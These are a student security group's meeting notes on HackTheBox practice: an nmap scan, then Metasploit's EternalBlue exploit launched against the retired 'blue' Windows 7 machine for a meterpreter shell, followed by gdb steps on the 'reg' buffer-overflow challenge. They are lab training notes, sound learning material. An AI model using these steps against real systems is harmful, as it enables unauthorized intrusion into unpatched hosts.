# March 3 2021

## Participants
- Reid Hurlburt
- Brennan
- Grace K
- Stephen Cole

## Activities
- Did the `blue` machine from HackTheBox
- Took a look at the basics behind buffer overflows in C at `repo.zenk-security.com`
- Tried the pwn challenged `reg` from Hack the Box's retired pwn challenges
- Took a look at `The_secret_of_a_queen`
- Took a look at `canvas`

### blue
Start with an `nmap` scan
	sudo nmap -sS -sC -sV -top-ports 100 10.10.10.40 -vv
- `-vv` for double-verbose

Results come back we see that there is an smb result.

Using `exploit-db.com` we check for windows 7 SMB exploits

We see that the box is called `blue` and there's an exploit called `eternal blue`...
But also, `eternal blue` is an eploit to execute code on Windows 7 servers, so it's probably what we want.

Then, using metasploit through `msfconsle`, search for Windows 7 SMB exploits.
There's a whole bunch.
We use exploit 2

Set the host to be our address. Use `ip a` to find our ip.
`>  set LHOST our_ip`
`> exploit`

This opens a `meterpreter` shell, but at least we're on their system.
Now we need to try to get access to a specific user.

The goal is to get the `user.txt` and the `root.txt` files, you need to be those users to get those files.

### Reg

Get the zip folder from our github repo /writeups/pwnreg.zip
`> unzip pwnreg.zip` gives us an executable called `reg`.
Running it asks for a user prompt. We know that this a pwn challenge so giving it a bunch of 
A's gives us a segfault (like we expect it to).
Using gdb to debug:
	(gdb) run
	(gdb) ^C
	(gdb) x/5i $pc-6
This series of commands will let us print 5 instructions starting from the program counter.

`info frame` can also help to show what's in your current stack frame
